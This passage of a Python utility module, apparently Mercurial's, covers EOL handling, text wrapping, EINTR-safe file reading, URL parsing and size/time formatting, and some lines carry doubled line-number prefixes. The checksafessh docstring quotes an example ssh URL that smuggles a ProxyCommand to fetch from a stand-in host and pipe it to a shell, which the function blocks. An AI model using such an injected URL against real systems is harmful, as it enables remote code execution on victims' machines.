    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2353
2353
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2356 # stray CR is an error.
2356 # stray CR is an error.
2357 _eolre = remod.compile(br'\r*\n')
2357 _eolre = remod.compile(br'\r*\n')
2358
2358
def tolf(s):
    """Normalize every EOL in s to a bare LF."""
    return _eolre.sub('\n', s)
2361
2361
def tocrlf(s):
    """Normalize every EOL in s to CRLF."""
    return _eolre.sub('\r\n', s)
2364
2364
# pick EOL converters matching the host platform's line separator
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2371
2371
def escapestr(s):
    """Backslash-escape a byte string (like s.encode('string_escape'))."""
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    return codecs.escape_encode(s)[0]
2376
2376
def unescapestr(s):
    """Undo escapestr(): decode backslash escapes in a byte string."""
    return codecs.escape_decode(s)[0]
2379
2379
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388
2388
def uirepr(s):
    """repr() a string for UI display."""
    # Avoid double backslash in Windows path repr()
    return repr(s).replace('\\\\', '\\')
2392
2392
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr so the head fits within space_left display columns
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2496
2496
def wrap(line, width, initindent='', hangindent=''):
    """Wrap byte string ``line`` to ``width`` display columns.

    ``initindent`` prefixes the first output line, ``hangindent`` every
    subsequent one. Input and result are byte strings in the local
    encoding; wrapping itself is done on the decoded text so column
    widths are computed correctly.
    """
    # decode/encode parameters are the same for every conversion below
    codec = pycompat.sysstr(encoding.encoding)
    errhandler = pycompat.sysstr(encoding.encodingmode)
    deepest = max(len(hangindent), len(initindent))
    if width <= deepest:
        # adjust for weird terminal size
        width = max(78, deepest + 1)
    uline = line.decode(codec, errhandler)
    uinit = initindent.decode(codec, errhandler)
    uhang = hangindent.decode(codec, errhandler)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=uinit,
                            subsequent_indent=uhang)
    return wrapper.fill(uline).encode(codec)
2512
2512
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate lines of fp via readline, which retries on EINTR."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield lines of fp, retrying raw os.read on EINTR.

            Reads bufsize-byte chunks from the underlying fd and
            reassembles them into newline-terminated lines; a trailing
            partial line is yielded last.
            """
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # keep the incomplete last line for the next round
                            line = l
                if not buf:
                    # EOF: empty read
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator over fp's lines that is safe against EINTR.

        Regular on-disk files (S_ISREG) take the fast path and are
        returned as-is; everything else (pipes, sockets, ttys) goes
        through the _safeiterfile workaround.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return fp itself; its line iterator is already EINTR-safe."""
        return fp
2584
2584
def iterlines(iterator):
    """Yield the individual lines contained in an iterable of chunks."""
    for piece in iterator:
        for text in piece.splitlines():
            yield text
2589
2589
def expandpath(path):
    """Expand environment variables, then ~ constructs, in ``path``."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2592
2592
def hgcmd():
    """Return the command list used to execute the current hg.

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2607
2607
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # record (pid, status) of whichever child just exited
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD may be absent on platforms without it (getattr guards that)
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # re-test condfn() after the liveness check: the child may
            # have satisfied the condition just before terminating
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # always restore the previous SIGCHLD handler
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2642
2642
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            # strip the leading backslash used to escape the prefix in
            # the regular expression
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # work on a copy so the caller's mapping is not mutated (the
        # original version inserted prefix_char into the caller's dict)
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2667
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric: fall back to a service-name lookup
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(
                _("no port number associated with service '%s'") % port)
2684
2684
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 'never': False}
2687 'never': False}
2688
2688
2689 def parsebool(s):
2689 def parsebool(s):
2690 """Parse s into a boolean.
2690 """Parse s into a boolean.
2691
2691
2692 If s is not a valid boolean, returns None.
2692 If s is not a valid boolean, returns None.
2693 """
2693 """
2694 return _booleans.get(s.lower(), None)
2694 return _booleans.get(s.lower(), None)
2695
2695
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 for a in string.hexdigits for b in string.hexdigits)
2697 for a in string.hexdigits for b in string.hexdigits)
2698
2698
2699 class url(object):
2699 class url(object):
2700 r"""Reliable URL parser.
2700 r"""Reliable URL parser.
2701
2701
2702 This parses URLs and provides attributes for the following
2702 This parses URLs and provides attributes for the following
2703 components:
2703 components:
2704
2704
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706
2706
2707 Missing components are set to None. The only exception is
2707 Missing components are set to None. The only exception is
2708 fragment, which is set to '' if present but empty.
2708 fragment, which is set to '' if present but empty.
2709
2709
2710 If parsefragment is False, fragment is included in query. If
2710 If parsefragment is False, fragment is included in query. If
2711 parsequery is False, query is included in path. If both are
2711 parsequery is False, query is included in path. If both are
2712 False, both fragment and query are included in path.
2712 False, both fragment and query are included in path.
2713
2713
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715
2715
2716 Note that for backward compatibility reasons, bundle URLs do not
2716 Note that for backward compatibility reasons, bundle URLs do not
2717 take host names. That means 'bundle://../' has a path of '../'.
2717 take host names. That means 'bundle://../' has a path of '../'.
2718
2718
2719 Examples:
2719 Examples:
2720
2720
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 >>> url(b'file:///home/joe/repo')
2725 >>> url(b'file:///home/joe/repo')
2726 <url scheme: 'file', path: '/home/joe/repo'>
2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 >>> url(b'file:///c:/temp/foo/')
2727 >>> url(b'file:///c:/temp/foo/')
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 >>> url(b'bundle:foo')
2729 >>> url(b'bundle:foo')
2730 <url scheme: 'bundle', path: 'foo'>
2730 <url scheme: 'bundle', path: 'foo'>
2731 >>> url(b'bundle://../foo')
2731 >>> url(b'bundle://../foo')
2732 <url scheme: 'bundle', path: '../foo'>
2732 <url scheme: 'bundle', path: '../foo'>
2733 >>> url(br'c:\foo\bar')
2733 >>> url(br'c:\foo\bar')
2734 <url path: 'c:\\foo\\bar'>
2734 <url path: 'c:\\foo\\bar'>
2735 >>> url(br'\\blah\blah\blah')
2735 >>> url(br'\\blah\blah\blah')
2736 <url path: '\\\\blah\\blah\\blah'>
2736 <url path: '\\\\blah\\blah\\blah'>
2737 >>> url(br'\\blah\blah\blah#baz')
2737 >>> url(br'\\blah\blah\blah#baz')
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 >>> url(br'file:///C:\users\me')
2739 >>> url(br'file:///C:\users\me')
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741
2741
2742 Authentication credentials:
2742 Authentication credentials:
2743
2743
2744 >>> url(b'ssh://joe:xyz@x/repo')
2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 >>> url(b'ssh://joe@x/repo')
2746 >>> url(b'ssh://joe@x/repo')
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748
2748
2749 Query strings and fragments:
2749 Query strings and fragments:
2750
2750
2751 >>> url(b'http://host/a?b#c')
2751 >>> url(b'http://host/a?b#c')
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755
2755
2756 Empty path:
2756 Empty path:
2757
2757
2758 >>> url(b'')
2758 >>> url(b'')
2759 <url path: ''>
2759 <url path: ''>
2760 >>> url(b'#a')
2760 >>> url(b'#a')
2761 <url path: '', fragment: 'a'>
2761 <url path: '', fragment: 'a'>
2762 >>> url(b'http://host/')
2762 >>> url(b'http://host/')
2763 <url scheme: 'http', host: 'host', path: ''>
2763 <url scheme: 'http', host: 'host', path: ''>
2764 >>> url(b'http://host/#a')
2764 >>> url(b'http://host/#a')
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766
2766
2767 Only scheme:
2767 Only scheme:
2768
2768
2769 >>> url(b'http:')
2769 >>> url(b'http:')
2770 <url scheme: 'http'>
2770 <url scheme: 'http'>
2771 """
2771 """
2772
2772
    # characters left unescaped when quoting the user/password components
    _safechars = "!~*'()+"
    # characters left unescaped when quoting the path/fragment components
    _safepchars = "/!~*'()+:\\"
    # matches a leading "<scheme>:" prefix
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776
2776
    def __init__(self, path, parsequery=True, parsefragment=True):
        """Parse ``path`` into URL components stored as attributes.

        Absent components are left as None (see the class docstring).
        Windows drive-letter/UNC paths, 'bundle:' paths and plain local
        paths are special-cased and short-circuit the general parse.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        # a "scheme:" prefix makes this a non-local URL
        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))
2868
2868
2869 @encoding.strmethod
2869 @encoding.strmethod
2870 def __repr__(self):
2870 def __repr__(self):
2871 attrs = []
2871 attrs = []
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 'query', 'fragment'):
2873 'query', 'fragment'):
2874 v = getattr(self, a)
2874 v = getattr(self, a)
2875 if v is not None:
2875 if v is not None:
2876 attrs.append('%s: %r' % (a, v))
2876 attrs.append('%s: %r' % (a, v))
2877 return '<url %s>' % ', '.join(attrs)
2877 return '<url %s>' % ', '.join(attrs)
2878
2878
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # local paths (and bundle: paths) round-trip without any quoting
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals must not be percent-quoted
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s
2955
2955
    # str(url) goes through __bytes__; encoding.strmethod presumably wraps
    # it to return a native/unicode string on Python 3 -- TODO confirm
    __str__ = encoding.strmethod(__bytes__)
2957
2957
2958 def authinfo(self):
2958 def authinfo(self):
2959 user, passwd = self.user, self.passwd
2959 user, passwd = self.user, self.passwd
2960 try:
2960 try:
2961 self.user, self.passwd = None, None
2961 self.user, self.passwd = None, None
2962 s = bytes(self)
2962 s = bytes(self)
2963 finally:
2963 finally:
2964 self.user, self.passwd = user, passwd
2964 self.user, self.passwd = user, passwd
2965 if not self.user:
2965 if not self.user:
2966 return (s, None)
2966 return (s, None)
2967 # authinfo[1] is passed to urllib2 password manager, and its
2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 # URIs must not contain credentials. The host is passed in the
2968 # URIs must not contain credentials. The host is passed in the
2969 # URIs list because Python < 2.4.3 uses only that to search for
2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 # a password.
2970 # a password.
2971 return (s, (None, (s, self.host),
2971 return (s, (None, (s, self.host),
2972 self.user, self.passwd or ''))
2972 self.user, self.passwd or ''))
2973
2973
2974 def isabs(self):
2974 def isabs(self):
2975 if self.scheme and self.scheme != 'file':
2975 if self.scheme and self.scheme != 'file':
2976 return True # remote URL
2976 return True # remote URL
2977 if hasdriveletter(self.path):
2977 if hasdriveletter(self.path):
2978 return True # absolute for our purposes - can't be joined()
2978 return True # absolute for our purposes - can't be joined()
2979 if self.path.startswith(br'\\'):
2979 if self.path.startswith(br'\\'):
2980 return True # Windows UNC path
2980 return True # Windows UNC path
2981 if self.path.startswith('/'):
2981 if self.path.startswith('/'):
2982 return True # POSIX-style
2982 return True # POSIX-style
2983 return False
2983 return False
2984
2984
2985 def localpath(self):
2985 def localpath(self):
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 path = self.path or '/'
2987 path = self.path or '/'
2988 # For Windows, we need to promote hosts containing drive
2988 # For Windows, we need to promote hosts containing drive
2989 # letters to paths with drive letters.
2989 # letters to paths with drive letters.
2990 if hasdriveletter(self._hostport):
2990 if hasdriveletter(self._hostport):
2991 path = self._hostport + '/' + self.path
2991 path = self._hostport + '/' + self.path
2992 elif (self.host is not None and self.path
2992 elif (self.host is not None and self.path
2993 and not hasdriveletter(path)):
2993 and not hasdriveletter(path)):
2994 path = '/' + path
2994 path = '/' + path
2995 return path
2995 return path
2996 return self._origpath
2996 return self._origpath
2997
2997
2998 def islocal(self):
2998 def islocal(self):
2999 '''whether localpath will return something that posixfile can open'''
2999 '''whether localpath will return something that posixfile can open'''
3000 return (not self.scheme or self.scheme == 'file'
3000 return (not self.scheme or self.scheme == 'file'
3001 or self.scheme == 'bundle')
3001 or self.scheme == 'bundle')
3002
3002
def hasscheme(path):
    """Report whether ``path`` carries an explicit URL scheme."""
    parsed = url(path)
    return bool(parsed.scheme)
3005
3005
def hasdriveletter(path):
    """Report whether ``path`` begins with a Windows drive letter ("X:").

    A falsy ``path`` is returned unchanged, preserving the original
    short-circuit behaviour of the ``and`` chain.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3008
3008
def urllocalpath(path):
    """Return the local filesystem path for a URL-ish path string."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3011
3011
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # unquote first so percent-encoded dashes cannot sneak through
    path = urlreq.unquote(path)
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
3026
3026
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # replace rather than drop, so the presence of a password stays
        # visible in logs without leaking it
        parsed.passwd = '***'
    return bytes(parsed)
3033
3033
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes for consistency with hidepassword() above; str(u) would
    # produce a unicode string on Python 3 while callers deal in bytes.
    return bytes(u)
3039
3039
# Human-friendly elapsed-time formatter built on unitcountfn(), which is
# defined earlier in this file.  Entries are (factor, divisor, format)
# triples scanned from seconds down to nanoseconds -- presumably the first
# entry whose scale matches the value wins; TODO confirm against
# unitcountfn's selection rule.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3055
3055
# current indentation depth for nested @timed reports; a one-element list
# so the wrapper closures in timed() can mutate it in place
_timenesting = [0]
3057
3057
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        indent = 2
        begin = timer()
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= indent
            # indent the report by nesting depth so the call structure
            # of nested @timed functions is visible
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapper
3082
3082
# suffix -> multiplier table; scanned in order by sizetoint(), so the bare
# 'b' entry must stay last or 'kb'/'mb'/'gb' would never be reached
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    value = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if value.endswith(suffix):
                return int(float(value[:-len(suffix)]) * multiplier)
        # no recognized suffix: plain byte count
        return int(value)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3104
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hookfn) pairs; left unsorted until invoked
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # sort in place by source name so invocation order is stable
        self._hooks.sort(key=lambda pair: pair[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3122
3122
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
